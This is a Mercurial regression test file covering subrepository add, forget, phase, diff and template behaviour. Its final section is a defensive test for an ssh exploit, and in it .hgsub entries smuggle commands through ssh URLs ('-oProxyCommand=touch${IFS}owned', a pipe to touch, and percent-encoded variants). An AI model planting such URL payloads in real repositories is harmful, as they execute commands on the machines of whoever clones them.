1380 parent: 11:365661e5936a
1380 parent: 11:365661e5936a
1381 user: test
1381 user: test
1382 date: Thu Jan 01 00:00:00 1970 +0000
1382 date: Thu Jan 01 00:00:00 1970 +0000
1383 files: .hgsub .hgsubstate
1383 files: .hgsub .hgsubstate
1384 description:
1384 description:
1385 rm2
1385 rm2
1386
1386
1387
1387
1388 Test issue3153: diff -S with deleted subrepos
1388 Test issue3153: diff -S with deleted subrepos
1389
1389
1390 $ hg diff --nodates -S -c .
1390 $ hg diff --nodates -S -c .
1391 diff -r 365661e5936a -r 2400bccd50af .hgsub
1391 diff -r 365661e5936a -r 2400bccd50af .hgsub
1392 --- a/.hgsub
1392 --- a/.hgsub
1393 +++ /dev/null
1393 +++ /dev/null
1394 @@ -1,2 +0,0 @@
1394 @@ -1,2 +0,0 @@
1395 -s = s
1395 -s = s
1396 -t = t
1396 -t = t
1397 diff -r 365661e5936a -r 2400bccd50af .hgsubstate
1397 diff -r 365661e5936a -r 2400bccd50af .hgsubstate
1398 --- a/.hgsubstate
1398 --- a/.hgsubstate
1399 +++ /dev/null
1399 +++ /dev/null
1400 @@ -1,2 +0,0 @@
1400 @@ -1,2 +0,0 @@
1401 -fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1401 -fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1402 -e95bcfa18a358dc4936da981ebf4147b4cad1362 t
1402 -e95bcfa18a358dc4936da981ebf4147b4cad1362 t
1403
1403
1404 Test behavior of add for explicit path in subrepo:
1404 Test behavior of add for explicit path in subrepo:
1405 $ cd ..
1405 $ cd ..
1406 $ hg init explicit
1406 $ hg init explicit
1407 $ cd explicit
1407 $ cd explicit
1408 $ echo s = s > .hgsub
1408 $ echo s = s > .hgsub
1409 $ hg add .hgsub
1409 $ hg add .hgsub
1410 $ hg init s
1410 $ hg init s
1411 $ hg ci -m0
1411 $ hg ci -m0
1412 Adding with an explicit path in a subrepo adds the file
1412 Adding with an explicit path in a subrepo adds the file
1413 $ echo c1 > f1
1413 $ echo c1 > f1
1414 $ echo c2 > s/f2
1414 $ echo c2 > s/f2
1415 $ hg st -S
1415 $ hg st -S
1416 ? f1
1416 ? f1
1417 ? s/f2
1417 ? s/f2
1418 $ hg add s/f2
1418 $ hg add s/f2
1419 $ hg st -S
1419 $ hg st -S
1420 A s/f2
1420 A s/f2
1421 ? f1
1421 ? f1
1422 $ hg ci -R s -m0
1422 $ hg ci -R s -m0
1423 $ hg ci -Am1
1423 $ hg ci -Am1
1424 adding f1
1424 adding f1
1425 Adding with an explicit path in a subrepo with -S has the same behavior
1425 Adding with an explicit path in a subrepo with -S has the same behavior
1426 $ echo c3 > f3
1426 $ echo c3 > f3
1427 $ echo c4 > s/f4
1427 $ echo c4 > s/f4
1428 $ hg st -S
1428 $ hg st -S
1429 ? f3
1429 ? f3
1430 ? s/f4
1430 ? s/f4
1431 $ hg add -S s/f4
1431 $ hg add -S s/f4
1432 $ hg st -S
1432 $ hg st -S
1433 A s/f4
1433 A s/f4
1434 ? f3
1434 ? f3
1435 $ hg ci -R s -m1
1435 $ hg ci -R s -m1
1436 $ hg ci -Ama2
1436 $ hg ci -Ama2
1437 adding f3
1437 adding f3
1438 Adding without a path or pattern silently ignores subrepos
1438 Adding without a path or pattern silently ignores subrepos
1439 $ echo c5 > f5
1439 $ echo c5 > f5
1440 $ echo c6 > s/f6
1440 $ echo c6 > s/f6
1441 $ echo c7 > s/f7
1441 $ echo c7 > s/f7
1442 $ hg st -S
1442 $ hg st -S
1443 ? f5
1443 ? f5
1444 ? s/f6
1444 ? s/f6
1445 ? s/f7
1445 ? s/f7
1446 $ hg add
1446 $ hg add
1447 adding f5
1447 adding f5
1448 $ hg st -S
1448 $ hg st -S
1449 A f5
1449 A f5
1450 ? s/f6
1450 ? s/f6
1451 ? s/f7
1451 ? s/f7
1452 $ hg ci -R s -Am2
1452 $ hg ci -R s -Am2
1453 adding f6
1453 adding f6
1454 adding f7
1454 adding f7
1455 $ hg ci -m3
1455 $ hg ci -m3
1456 Adding without a path or pattern with -S also adds files in subrepos
1456 Adding without a path or pattern with -S also adds files in subrepos
1457 $ echo c8 > f8
1457 $ echo c8 > f8
1458 $ echo c9 > s/f9
1458 $ echo c9 > s/f9
1459 $ echo c10 > s/f10
1459 $ echo c10 > s/f10
1460 $ hg st -S
1460 $ hg st -S
1461 ? f8
1461 ? f8
1462 ? s/f10
1462 ? s/f10
1463 ? s/f9
1463 ? s/f9
1464 $ hg add -S
1464 $ hg add -S
1465 adding f8
1465 adding f8
1466 adding s/f10 (glob)
1466 adding s/f10 (glob)
1467 adding s/f9 (glob)
1467 adding s/f9 (glob)
1468 $ hg st -S
1468 $ hg st -S
1469 A f8
1469 A f8
1470 A s/f10
1470 A s/f10
1471 A s/f9
1471 A s/f9
1472 $ hg ci -R s -m3
1472 $ hg ci -R s -m3
1473 $ hg ci -m4
1473 $ hg ci -m4
1474 Adding with a pattern silently ignores subrepos
1474 Adding with a pattern silently ignores subrepos
1475 $ echo c11 > fm11
1475 $ echo c11 > fm11
1476 $ echo c12 > fn12
1476 $ echo c12 > fn12
1477 $ echo c13 > s/fm13
1477 $ echo c13 > s/fm13
1478 $ echo c14 > s/fn14
1478 $ echo c14 > s/fn14
1479 $ hg st -S
1479 $ hg st -S
1480 ? fm11
1480 ? fm11
1481 ? fn12
1481 ? fn12
1482 ? s/fm13
1482 ? s/fm13
1483 ? s/fn14
1483 ? s/fn14
1484 $ hg add 'glob:**fm*'
1484 $ hg add 'glob:**fm*'
1485 adding fm11
1485 adding fm11
1486 $ hg st -S
1486 $ hg st -S
1487 A fm11
1487 A fm11
1488 ? fn12
1488 ? fn12
1489 ? s/fm13
1489 ? s/fm13
1490 ? s/fn14
1490 ? s/fn14
1491 $ hg ci -R s -Am4
1491 $ hg ci -R s -Am4
1492 adding fm13
1492 adding fm13
1493 adding fn14
1493 adding fn14
1494 $ hg ci -Am5
1494 $ hg ci -Am5
1495 adding fn12
1495 adding fn12
1496 Adding with a pattern with -S also adds matches in subrepos
1496 Adding with a pattern with -S also adds matches in subrepos
1497 $ echo c15 > fm15
1497 $ echo c15 > fm15
1498 $ echo c16 > fn16
1498 $ echo c16 > fn16
1499 $ echo c17 > s/fm17
1499 $ echo c17 > s/fm17
1500 $ echo c18 > s/fn18
1500 $ echo c18 > s/fn18
1501 $ hg st -S
1501 $ hg st -S
1502 ? fm15
1502 ? fm15
1503 ? fn16
1503 ? fn16
1504 ? s/fm17
1504 ? s/fm17
1505 ? s/fn18
1505 ? s/fn18
1506 $ hg add -S 'glob:**fm*'
1506 $ hg add -S 'glob:**fm*'
1507 adding fm15
1507 adding fm15
1508 adding s/fm17 (glob)
1508 adding s/fm17 (glob)
1509 $ hg st -S
1509 $ hg st -S
1510 A fm15
1510 A fm15
1511 A s/fm17
1511 A s/fm17
1512 ? fn16
1512 ? fn16
1513 ? s/fn18
1513 ? s/fn18
1514 $ hg ci -R s -Am5
1514 $ hg ci -R s -Am5
1515 adding fn18
1515 adding fn18
1516 $ hg ci -Am6
1516 $ hg ci -Am6
1517 adding fn16
1517 adding fn16
1518
1518
1519 Test behavior of forget for explicit path in subrepo:
1519 Test behavior of forget for explicit path in subrepo:
1520 Forgetting an explicit path in a subrepo untracks the file
1520 Forgetting an explicit path in a subrepo untracks the file
1521 $ echo c19 > s/f19
1521 $ echo c19 > s/f19
1522 $ hg add s/f19
1522 $ hg add s/f19
1523 $ hg st -S
1523 $ hg st -S
1524 A s/f19
1524 A s/f19
1525 $ hg forget s/f19
1525 $ hg forget s/f19
1526 $ hg st -S
1526 $ hg st -S
1527 ? s/f19
1527 ? s/f19
1528 $ rm s/f19
1528 $ rm s/f19
1529 $ cd ..
1529 $ cd ..
1530
1530
1531 Courtesy phases synchronisation to publishing server does not block the push
1531 Courtesy phases synchronisation to publishing server does not block the push
1532 (issue3781)
1532 (issue3781)
1533
1533
1534 $ cp -R main issue3781
1534 $ cp -R main issue3781
1535 $ cp -R main issue3781-dest
1535 $ cp -R main issue3781-dest
1536 $ cd issue3781-dest/s
1536 $ cd issue3781-dest/s
1537 $ hg phase tip # show we have draft changeset
1537 $ hg phase tip # show we have draft changeset
1538 5: draft
1538 5: draft
1539 $ chmod a-w .hg/store/phaseroots # prevent phase push
1539 $ chmod a-w .hg/store/phaseroots # prevent phase push
1540 $ cd ../../issue3781
1540 $ cd ../../issue3781
1541 $ cat >> .hg/hgrc << EOF
1541 $ cat >> .hg/hgrc << EOF
1542 > [paths]
1542 > [paths]
1543 > default=../issue3781-dest/
1543 > default=../issue3781-dest/
1544 > EOF
1544 > EOF
1545 $ hg push --config devel.legacy.exchange=bundle1
1545 $ hg push --config devel.legacy.exchange=bundle1
1546 pushing to $TESTTMP/issue3781-dest (glob)
1546 pushing to $TESTTMP/issue3781-dest (glob)
1547 pushing subrepo s to $TESTTMP/issue3781-dest/s
1547 pushing subrepo s to $TESTTMP/issue3781-dest/s
1548 searching for changes
1548 searching for changes
1549 no changes found
1549 no changes found
1550 searching for changes
1550 searching for changes
1551 no changes found
1551 no changes found
1552 [1]
1552 [1]
1553 # clean the push cache
1553 # clean the push cache
1554 $ rm s/.hg/cache/storehash/*
1554 $ rm s/.hg/cache/storehash/*
1555 $ hg push # bundle2+
1555 $ hg push # bundle2+
1556 pushing to $TESTTMP/issue3781-dest (glob)
1556 pushing to $TESTTMP/issue3781-dest (glob)
1557 pushing subrepo s to $TESTTMP/issue3781-dest/s
1557 pushing subrepo s to $TESTTMP/issue3781-dest/s
1558 searching for changes
1558 searching for changes
1559 no changes found
1559 no changes found
1560 searching for changes
1560 searching for changes
1561 no changes found
1561 no changes found
1562 [1]
1562 [1]
1563 $ cd ..
1563 $ cd ..
1564
1564
1565 Test phase choice for newly created commit with "phases.subrepochecks"
1565 Test phase choice for newly created commit with "phases.subrepochecks"
1566 configuration
1566 configuration
1567
1567
1568 $ cd t
1568 $ cd t
1569 $ hg update -q -r 12
1569 $ hg update -q -r 12
1570
1570
1571 $ cat >> s/ss/.hg/hgrc <<EOF
1571 $ cat >> s/ss/.hg/hgrc <<EOF
1572 > [phases]
1572 > [phases]
1573 > new-commit = secret
1573 > new-commit = secret
1574 > EOF
1574 > EOF
1575 $ cat >> s/.hg/hgrc <<EOF
1575 $ cat >> s/.hg/hgrc <<EOF
1576 > [phases]
1576 > [phases]
1577 > new-commit = draft
1577 > new-commit = draft
1578 > EOF
1578 > EOF
1579 $ echo phasecheck1 >> s/ss/a
1579 $ echo phasecheck1 >> s/ss/a
1580 $ hg -R s commit -S --config phases.checksubrepos=abort -m phasecheck1
1580 $ hg -R s commit -S --config phases.checksubrepos=abort -m phasecheck1
1581 committing subrepository ss
1581 committing subrepository ss
1582 transaction abort!
1582 transaction abort!
1583 rollback completed
1583 rollback completed
1584 abort: can't commit in draft phase conflicting secret from subrepository ss
1584 abort: can't commit in draft phase conflicting secret from subrepository ss
1585 [255]
1585 [255]
1586 $ echo phasecheck2 >> s/ss/a
1586 $ echo phasecheck2 >> s/ss/a
1587 $ hg -R s commit -S --config phases.checksubrepos=ignore -m phasecheck2
1587 $ hg -R s commit -S --config phases.checksubrepos=ignore -m phasecheck2
1588 committing subrepository ss
1588 committing subrepository ss
1589 $ hg -R s/ss phase tip
1589 $ hg -R s/ss phase tip
1590 3: secret
1590 3: secret
1591 $ hg -R s phase tip
1591 $ hg -R s phase tip
1592 6: draft
1592 6: draft
1593 $ echo phasecheck3 >> s/ss/a
1593 $ echo phasecheck3 >> s/ss/a
1594 $ hg -R s commit -S -m phasecheck3
1594 $ hg -R s commit -S -m phasecheck3
1595 committing subrepository ss
1595 committing subrepository ss
1596 warning: changes are committed in secret phase from subrepository ss
1596 warning: changes are committed in secret phase from subrepository ss
1597 $ hg -R s/ss phase tip
1597 $ hg -R s/ss phase tip
1598 4: secret
1598 4: secret
1599 $ hg -R s phase tip
1599 $ hg -R s phase tip
1600 7: secret
1600 7: secret
1601
1601
1602 $ cat >> t/.hg/hgrc <<EOF
1602 $ cat >> t/.hg/hgrc <<EOF
1603 > [phases]
1603 > [phases]
1604 > new-commit = draft
1604 > new-commit = draft
1605 > EOF
1605 > EOF
1606 $ cat >> .hg/hgrc <<EOF
1606 $ cat >> .hg/hgrc <<EOF
1607 > [phases]
1607 > [phases]
1608 > new-commit = public
1608 > new-commit = public
1609 > EOF
1609 > EOF
1610 $ echo phasecheck4 >> s/ss/a
1610 $ echo phasecheck4 >> s/ss/a
1611 $ echo phasecheck4 >> t/t
1611 $ echo phasecheck4 >> t/t
1612 $ hg commit -S -m phasecheck4
1612 $ hg commit -S -m phasecheck4
1613 committing subrepository s
1613 committing subrepository s
1614 committing subrepository s/ss (glob)
1614 committing subrepository s/ss (glob)
1615 warning: changes are committed in secret phase from subrepository ss
1615 warning: changes are committed in secret phase from subrepository ss
1616 committing subrepository t
1616 committing subrepository t
1617 warning: changes are committed in secret phase from subrepository s
1617 warning: changes are committed in secret phase from subrepository s
1618 created new head
1618 created new head
1619 $ hg -R s/ss phase tip
1619 $ hg -R s/ss phase tip
1620 5: secret
1620 5: secret
1621 $ hg -R s phase tip
1621 $ hg -R s phase tip
1622 8: secret
1622 8: secret
1623 $ hg -R t phase tip
1623 $ hg -R t phase tip
1624 6: draft
1624 6: draft
1625 $ hg phase tip
1625 $ hg phase tip
1626 15: secret
1626 15: secret
1627
1627
1628 $ cd ..
1628 $ cd ..
1629
1629
1630
1630
1631 Test that commit --secret works on both repo and subrepo (issue4182)
1631 Test that commit --secret works on both repo and subrepo (issue4182)
1632
1632
1633 $ cd main
1633 $ cd main
1634 $ echo secret >> b
1634 $ echo secret >> b
1635 $ echo secret >> s/b
1635 $ echo secret >> s/b
1636 $ hg commit --secret --subrepo -m "secret"
1636 $ hg commit --secret --subrepo -m "secret"
1637 committing subrepository s
1637 committing subrepository s
1638 $ hg phase -r .
1638 $ hg phase -r .
1639 6: secret
1639 6: secret
1640 $ cd s
1640 $ cd s
1641 $ hg phase -r .
1641 $ hg phase -r .
1642 6: secret
1642 6: secret
1643 $ cd ../../
1643 $ cd ../../
1644
1644
1645 Test "subrepos" template keyword
1645 Test "subrepos" template keyword
1646
1646
1647 $ cd t
1647 $ cd t
1648 $ hg update -q 15
1648 $ hg update -q 15
1649 $ cat > .hgsub <<EOF
1649 $ cat > .hgsub <<EOF
1650 > s = s
1650 > s = s
1651 > EOF
1651 > EOF
1652 $ hg commit -m "16"
1652 $ hg commit -m "16"
1653 warning: changes are committed in secret phase from subrepository s
1653 warning: changes are committed in secret phase from subrepository s
1654
1654
1655 (addition of ".hgsub" itself)
1655 (addition of ".hgsub" itself)
1656
1656
1657 $ hg diff --nodates -c 1 .hgsubstate
1657 $ hg diff --nodates -c 1 .hgsubstate
1658 diff -r f7b1eb17ad24 -r 7cf8cfea66e4 .hgsubstate
1658 diff -r f7b1eb17ad24 -r 7cf8cfea66e4 .hgsubstate
1659 --- /dev/null
1659 --- /dev/null
1660 +++ b/.hgsubstate
1660 +++ b/.hgsubstate
1661 @@ -0,0 +1,1 @@
1661 @@ -0,0 +1,1 @@
1662 +e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1662 +e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1663 $ hg log -r 1 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1663 $ hg log -r 1 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1664 f7b1eb17ad24 000000000000
1664 f7b1eb17ad24 000000000000
1665 s
1665 s
1666
1666
1667 (modification of existing entry)
1667 (modification of existing entry)
1668
1668
1669 $ hg diff --nodates -c 2 .hgsubstate
1669 $ hg diff --nodates -c 2 .hgsubstate
1670 diff -r 7cf8cfea66e4 -r df30734270ae .hgsubstate
1670 diff -r 7cf8cfea66e4 -r df30734270ae .hgsubstate
1671 --- a/.hgsubstate
1671 --- a/.hgsubstate
1672 +++ b/.hgsubstate
1672 +++ b/.hgsubstate
1673 @@ -1,1 +1,1 @@
1673 @@ -1,1 +1,1 @@
1674 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1674 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1675 +dc73e2e6d2675eb2e41e33c205f4bdab4ea5111d s
1675 +dc73e2e6d2675eb2e41e33c205f4bdab4ea5111d s
1676 $ hg log -r 2 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1676 $ hg log -r 2 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1677 7cf8cfea66e4 000000000000
1677 7cf8cfea66e4 000000000000
1678 s
1678 s
1679
1679
1680 (addition of entry)
1680 (addition of entry)
1681
1681
1682 $ hg diff --nodates -c 5 .hgsubstate
1682 $ hg diff --nodates -c 5 .hgsubstate
1683 diff -r 7cf8cfea66e4 -r 1f14a2e2d3ec .hgsubstate
1683 diff -r 7cf8cfea66e4 -r 1f14a2e2d3ec .hgsubstate
1684 --- a/.hgsubstate
1684 --- a/.hgsubstate
1685 +++ b/.hgsubstate
1685 +++ b/.hgsubstate
1686 @@ -1,1 +1,2 @@
1686 @@ -1,1 +1,2 @@
1687 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1687 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1688 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1688 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1689 $ hg log -r 5 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1689 $ hg log -r 5 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1690 7cf8cfea66e4 000000000000
1690 7cf8cfea66e4 000000000000
1691 t
1691 t
1692
1692
1693 (removal of existing entry)
1693 (removal of existing entry)
1694
1694
1695 $ hg diff --nodates -c 16 .hgsubstate
1695 $ hg diff --nodates -c 16 .hgsubstate
1696 diff -r 8bec38d2bd0b -r f2f70bc3d3c9 .hgsubstate
1696 diff -r 8bec38d2bd0b -r f2f70bc3d3c9 .hgsubstate
1697 --- a/.hgsubstate
1697 --- a/.hgsubstate
1698 +++ b/.hgsubstate
1698 +++ b/.hgsubstate
1699 @@ -1,2 +1,1 @@
1699 @@ -1,2 +1,1 @@
1700 0731af8ca9423976d3743119d0865097c07bdc1b s
1700 0731af8ca9423976d3743119d0865097c07bdc1b s
1701 -e202dc79b04c88a636ea8913d9182a1346d9b3dc t
1701 -e202dc79b04c88a636ea8913d9182a1346d9b3dc t
1702 $ hg log -r 16 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1702 $ hg log -r 16 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1703 8bec38d2bd0b 000000000000
1703 8bec38d2bd0b 000000000000
1704 t
1704 t
1705
1705
1706 (merging)
1706 (merging)
1707
1707
1708 $ hg diff --nodates -c 9 .hgsubstate
1708 $ hg diff --nodates -c 9 .hgsubstate
1709 diff -r f6affe3fbfaa -r f0d2028bf86d .hgsubstate
1709 diff -r f6affe3fbfaa -r f0d2028bf86d .hgsubstate
1710 --- a/.hgsubstate
1710 --- a/.hgsubstate
1711 +++ b/.hgsubstate
1711 +++ b/.hgsubstate
1712 @@ -1,1 +1,2 @@
1712 @@ -1,1 +1,2 @@
1713 fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1713 fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1714 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1714 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1715 $ hg log -r 9 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1715 $ hg log -r 9 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1716 f6affe3fbfaa 1f14a2e2d3ec
1716 f6affe3fbfaa 1f14a2e2d3ec
1717 t
1717 t
1718
1718
1719 (removal of ".hgsub" itself)
1719 (removal of ".hgsub" itself)
1720
1720
1721 $ hg diff --nodates -c 8 .hgsubstate
1721 $ hg diff --nodates -c 8 .hgsubstate
1722 diff -r f94576341bcf -r 96615c1dad2d .hgsubstate
1722 diff -r f94576341bcf -r 96615c1dad2d .hgsubstate
1723 --- a/.hgsubstate
1723 --- a/.hgsubstate
1724 +++ /dev/null
1724 +++ /dev/null
1725 @@ -1,2 +0,0 @@
1725 @@ -1,2 +0,0 @@
1726 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1726 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1727 -7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4 t
1727 -7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4 t
1728 $ hg log -r 8 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1728 $ hg log -r 8 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1729 f94576341bcf 000000000000
1729 f94576341bcf 000000000000
1730
1730
1731 Test that '[paths]' is configured correctly at subrepo creation
1731 Test that '[paths]' is configured correctly at subrepo creation
1732
1732
1733 $ cd $TESTTMP/tc
1733 $ cd $TESTTMP/tc
1734 $ cat > .hgsub <<EOF
1734 $ cat > .hgsub <<EOF
1735 > # to clear bogus subrepo path 'bogus=[boguspath'
1735 > # to clear bogus subrepo path 'bogus=[boguspath'
1736 > s = s
1736 > s = s
1737 > t = t
1737 > t = t
1738 > EOF
1738 > EOF
1739 $ hg update -q --clean null
1739 $ hg update -q --clean null
1740 $ rm -rf s t
1740 $ rm -rf s t
1741 $ cat >> .hg/hgrc <<EOF
1741 $ cat >> .hg/hgrc <<EOF
1742 > [paths]
1742 > [paths]
1743 > default-push = /foo/bar
1743 > default-push = /foo/bar
1744 > EOF
1744 > EOF
1745 $ hg update -q
1745 $ hg update -q
1746 $ cat s/.hg/hgrc
1746 $ cat s/.hg/hgrc
1747 [paths]
1747 [paths]
1748 default = $TESTTMP/t/s
1748 default = $TESTTMP/t/s
1749 default-push = /foo/bar/s
1749 default-push = /foo/bar/s
1750 $ cat s/ss/.hg/hgrc
1750 $ cat s/ss/.hg/hgrc
1751 [paths]
1751 [paths]
1752 default = $TESTTMP/t/s/ss
1752 default = $TESTTMP/t/s/ss
1753 default-push = /foo/bar/s/ss
1753 default-push = /foo/bar/s/ss
1754 $ cat t/.hg/hgrc
1754 $ cat t/.hg/hgrc
1755 [paths]
1755 [paths]
1756 default = $TESTTMP/t/t
1756 default = $TESTTMP/t/t
1757 default-push = /foo/bar/t
1757 default-push = /foo/bar/t
1758
1758
1759 $ cd $TESTTMP/t
1759 $ cd $TESTTMP/t
1760 $ hg up -qC 0
1760 $ hg up -qC 0
1761 $ echo 'bar' > bar.txt
1761 $ echo 'bar' > bar.txt
1762 $ hg ci -Am 'branch before subrepo add'
1762 $ hg ci -Am 'branch before subrepo add'
1763 adding bar.txt
1763 adding bar.txt
1764 created new head
1764 created new head
1765 $ hg merge -r "first(subrepo('s'))"
1765 $ hg merge -r "first(subrepo('s'))"
1766 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1766 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
1767 (branch merge, don't forget to commit)
1767 (branch merge, don't forget to commit)
1768 $ hg status -S -X '.hgsub*'
1768 $ hg status -S -X '.hgsub*'
1769 A s/a
1769 A s/a
1770 ? s/b
1770 ? s/b
1771 ? s/c
1771 ? s/c
1772 ? s/f1
1772 ? s/f1
1773 $ hg status -S --rev 'p2()'
1773 $ hg status -S --rev 'p2()'
1774 A bar.txt
1774 A bar.txt
1775 ? s/b
1775 ? s/b
1776 ? s/c
1776 ? s/c
1777 ? s/f1
1777 ? s/f1
1778 $ hg diff -S -X '.hgsub*' --nodates
1778 $ hg diff -S -X '.hgsub*' --nodates
1779 diff -r 000000000000 s/a
1779 diff -r 000000000000 s/a
1780 --- /dev/null
1780 --- /dev/null
1781 +++ b/s/a
1781 +++ b/s/a
1782 @@ -0,0 +1,1 @@
1782 @@ -0,0 +1,1 @@
1783 +a
1783 +a
1784 $ hg diff -S --rev 'p2()' --nodates
1784 $ hg diff -S --rev 'p2()' --nodates
1785 diff -r 7cf8cfea66e4 bar.txt
1785 diff -r 7cf8cfea66e4 bar.txt
1786 --- /dev/null
1786 --- /dev/null
1787 +++ b/bar.txt
1787 +++ b/bar.txt
1788 @@ -0,0 +1,1 @@
1788 @@ -0,0 +1,1 @@
1789 +bar
1789 +bar
1790
1790
1791 $ cd ..
1791 $ cd ..
1792
1793 test for ssh exploit 2017-07-25
1794
1795 $ cat >> $HGRCPATH << EOF
1796 > [ui]
1797 > ssh = sh -c "read l; read l; read l"
1798 > EOF
1799
1800 $ hg init malicious-proxycommand
1801 $ cd malicious-proxycommand
1802 $ echo 's = [hg]ssh://-oProxyCommand=touch${IFS}owned/path' > .hgsub
1803 $ hg init s
1804 $ cd s
1805 $ echo init > init
1806 $ hg add
1807 adding init
1808 $ hg commit -m init
1809 $ cd ..
1810 $ hg add .hgsub
1811 $ hg ci -m 'add subrepo'
1812 $ cd ..
1813 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1814 updating to branch default
1815 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepository "s")
1816 [255]
1817
1818 also check that a percent encoded '-' (%2D) doesn't work
1819
1820 $ cd malicious-proxycommand
1821 $ echo 's = [hg]ssh://%2DoProxyCommand=touch${IFS}owned/path' > .hgsub
1822 $ hg ci -m 'change url to percent encoded'
1823 $ cd ..
1824 $ rm -r malicious-proxycommand-clone
1825 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1826 updating to branch default
1827 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path' (in subrepository "s")
1828 [255]
1829
1830 also check for a pipe
1831
1832 $ cd malicious-proxycommand
1833 $ echo 's = [hg]ssh://fakehost|touch${IFS}owned/path' > .hgsub
1834 $ hg ci -m 'change url to pipe'
1835 $ cd ..
1836 $ rm -r malicious-proxycommand-clone
1837 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1838 updating to branch default
1839 abort: no suitable response from remote hg!
1840 [255]
1841 $ [ ! -f owned ] || echo 'you got owned'
1842
1843 also check that a percent encoded '|' (%7C) doesn't work
1844
1845 $ cd malicious-proxycommand
1846 $ echo 's = [hg]ssh://fakehost%7Ctouch%20owned/path' > .hgsub
1847 $ hg ci -m 'change url to percent encoded pipe'
1848 $ cd ..
1849 $ rm -r malicious-proxycommand-clone
1850 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1851 updating to branch default
1852 abort: no suitable response from remote hg!
1853 [255]
1854 $ [ ! -f owned ] || echo 'you got owned'
1855
1856 and bad usernames:
1857 $ cd malicious-proxycommand
1858 $ echo 's = [hg]ssh://-oProxyCommand=touch owned@example.com/path' > .hgsub
1859 $ hg ci -m 'owned username'
1860 $ cd ..
1861 $ rm -r malicious-proxycommand-clone
1862 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1863 updating to branch default
1864 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch owned@example.com/path' (in subrepository "s")
1865 [255]
General Comments 0
You need to be logged in to leave comments. Login now